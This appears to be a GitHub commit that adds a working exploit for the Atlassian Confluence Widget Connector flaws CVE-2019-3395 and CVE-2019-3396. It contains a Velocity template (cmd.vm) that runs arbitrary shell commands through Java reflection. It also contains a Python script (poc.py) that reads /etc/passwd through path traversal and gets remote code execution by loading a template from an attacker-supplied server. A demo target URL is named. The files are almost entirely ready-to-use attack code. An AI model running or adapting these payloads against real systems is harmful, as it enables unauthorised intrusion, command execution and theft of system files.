Add files via upload

Author: jiushill

CVE-2019-3395 and CVE-2019-3396/cmd.vm

@@ -0,0 +1,9 @@
+#set ($e="exp")
+#set ($a=$e.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec($cmd))
+#set ($input=$e.getClass().forName("java.lang.Process").getMethod("getInputStream").invoke($a))
+#set($sc = $e.getClass().forName("java.util.Scanner"))
+#set($constructor = $sc.getDeclaredConstructor($e.getClass().forName("java.io.InputStream")))
+#set($scan=$constructor.newInstance($input).useDelimiter("\\A"))
+#if($scan.hasNext())
+    $scan.next()
+#end

CVE-2019-3395 and CVE-2019-3396/poc.py

@@ -0,0 +1,66 @@
+#author:jiushi
+#time:2019/4/12
+
+import requests
+import re
+
+class Demon:
+    def __init__(self,headers,url,data,headers2,data2):
+        self.headers=headers
+        self.url=url
+        self.data=data
+        self.headers2=headers2
+        self.data2=data2
+
+    def poc(self):
+        exp_path='{}{}'.format(str(self.url).rstrip('/'),'/rest/tinymce/1/macro/preview')
+        try:
+            rqt=requests.post(url=exp_path,headers=self.headers,data=self.data)
+            jg=re.findall('.*[:].*[:].*',rqt.text)
+            if len(jg)>0:
+                print('[+] Found CVE-2019-3395')
+                for c in jg:
+                    print(c)
+            else:
+                print('[-] Not Found CVE-2019-3395')
+        except Exception as r:
+            print('[-] Error {}'.format(r))
+            pass
+
+    def exec(self):
+        exp_path='{}{}'.format(str(self.url).rstrip('/'),'/rest/tinymce/1/macro/preview')
+        try:
+            rgt=requests.post(url=exp_path,headers=self.headers2,data=self.data2)
+            if rgt.status_code == 200 and "wiki-content" in rgt.text:
+                m = re.findall('.*wiki-content">\n(.*)\n            </div>\n', rgt.text, re.S)
+                print(m[0])
+            else:
+                print('[-] Not Found CVE-2019-3396')
+        except Exception as r:
+            print('[-] Error {}'.format(r))
+            pass
+
+if __name__ == '__main__':
+    print('[+] Demon url:{}'.format('https://confluence.tymaker.cn'))
+    print('[+] pid 1 CVE-2019-3395')
+    print('[+] pid 2 CVE-2019-3396')
+    urls=input('your url:').strip()
+    filename=input('attack ftp:')
+    cmd='whoami'
+    headers={'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36',
+             'Referer':'{}/login.action?os_destination=%2Findex.action&permissionViolation=true'.format(urls.rstrip('/')),
+             'Content-Type': 'application/json; charset=utf-8'}
+    datas='{"contentId":"65601","macro":{"name":"widget","params":{"url":"https://www.dailymotion.com/video/xcpa64","width":"300","height":"200","_template":"file:///etc/passwd"},"body":""}}'
+
+    headers2 = {
+        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0",
+        "Referer": str(urls).strip('/') + "/pages/resumedraft.action?draftId=12345&draftShareId=056b55bc-fc4a-487b-b1e1-8f673f280c23&",
+        "Content-Type": "application/json; charset=utf-8"
+    }
+    data2='{"contentId":"12345","macro":{"name":"widget","body":"","params":{"url":"http://www.dailymotion.com/video/xcpa64","width":"300","height":"200","_template":"%s","cmd":"%s"}}}'%(filename, cmd)
+    obj=Demon(headers=headers,url=urls,data=datas,headers2=headers2,data2=data2)
+    pid=input('pid:')
+    if pid=='1':
+        obj.poc()
+    elif pid=='2':
+        obj.exec()